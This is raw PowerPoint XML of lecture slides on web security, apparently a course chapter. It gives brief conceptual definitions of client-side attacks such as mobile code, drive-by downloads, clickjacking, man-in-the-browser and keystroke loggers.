            <a:pPr marL="889000" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>amazon.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: session-id </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99684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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Chapter 7: roadmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3982" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The World Wide Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3982" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3982" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3982" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacks on Clients</a:t>
            </a:r>
          </a:p>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.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3982" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacks on Servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{55B28040-0FD8-C544-8357-9EE6C5A36700}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27210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smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Mobile Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650240" y="2291899"/>
            <a:ext cx="11704320" cy="5960533"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3129" b="0" dirty="0">
                <a:ln w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Programs that can be shipped unchanged to a variety of platforms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3129" b="0" dirty="0">
                <a:ln w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Transmitted from a remote system to a local system and then executed on the local system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3129" b="0" dirty="0">
                <a:ln w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Often acts as a mechanism for a virus, worm, or Trojan horse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3129" b="0" dirty="0">
                <a:ln w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Takes advantage of vulnerabilities to perform its own exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3129" b="0" dirty="0">
                <a:ln w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Popular vehicles include Java applets, ActiveX, JavaScript and VBScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="185635597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dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Chapter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>7: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19460" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3982" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3982" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.1 The World Wide Web</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3982" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>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.2 Attacks on Clients</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3982" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>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.3 Attacks on Servers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3982" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19461" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12344842" y="9359900"/>
            <a:ext cx="139462" cy="2627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13">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="1056623" indent="-406394">
              <a:defRPr sz="3413">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1625575" indent="-325115">
              <a:defRPr sz="3413">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2275804" indent="-325115">
              <a:defRPr sz="3413">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2926034" indent="-325115">
              <a:defRPr sz="3413">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="3576264" indent="-325115" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3413">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="4226494" indent="-325115" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3413">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4876724" indent="-325115" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3413">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="5526954" indent="-325115" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3413">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1707" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145061904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884903"/>
            <a:ext cx="11704320" cy="849070"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ln w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Drive-By-Downloads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650240" y="2492587"/>
            <a:ext cx="11704320" cy="6436925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>xploits browser vulnerabilities to download and installs malware on the system when the user views a Web page controlled by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>n most cases does not actively propagate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>preads when users visit the malicious Web page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60420" name="Picture 26"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8128000" y="5960534"/>
            <a:ext cx="4334933" cy="3440853"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="720664207"/>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613" y="1004201"/>
            <a:ext cx="11704320" cy="809304"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:ln w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ln w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ln w="0"/>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="dk1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325120" y="2059093"/>
            <a:ext cx="6285653" cy="7044267"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:ln w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Also known as a user-interface (UI) redress attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:ln w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Using a similar technique, keystrokes can also be hijacked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A user can be led to believe they are typing in the password to their email or bank account, but are instead typing into an invisible frame controlled by the attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6195166" y="2059093"/>
            <a:ext cx="6484514" cy="7694507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:ln w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Vulnerability used by an attacker to collect an infected user’s clicks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="1707"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2702" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The attacker can force the user to do a variety of things from adjusting the user’s computer setters to unwittingly sending the user to Web sites that might have malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="1707"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2702" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>By taking advantage of Adobe Flash or JavaScript an attacker could even place a button under or over a legitimate button making it difficult for users to detect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="1707"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2702" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A typical attack uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the top level page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="1707"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2702" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The attacker is hijacking clicks meant for one page and routing them to another page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168089751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240" y="899652"/>
            <a:ext cx="11704320" cy="802395"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ln w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Social Engineering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650240" y="2122567"/>
            <a:ext cx="11704320" cy="679627"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:ln w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLs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252857859"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="896484" y="2946618"/>
          <a:ext cx="11054080" cy="6105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6531955"/>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Man-in-the-Browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="fig04-0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242" b="-4361"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1406302" y="2223821"/>
            <a:ext cx="10187093" cy="7093683"/>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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9768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Keystroke Logger</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
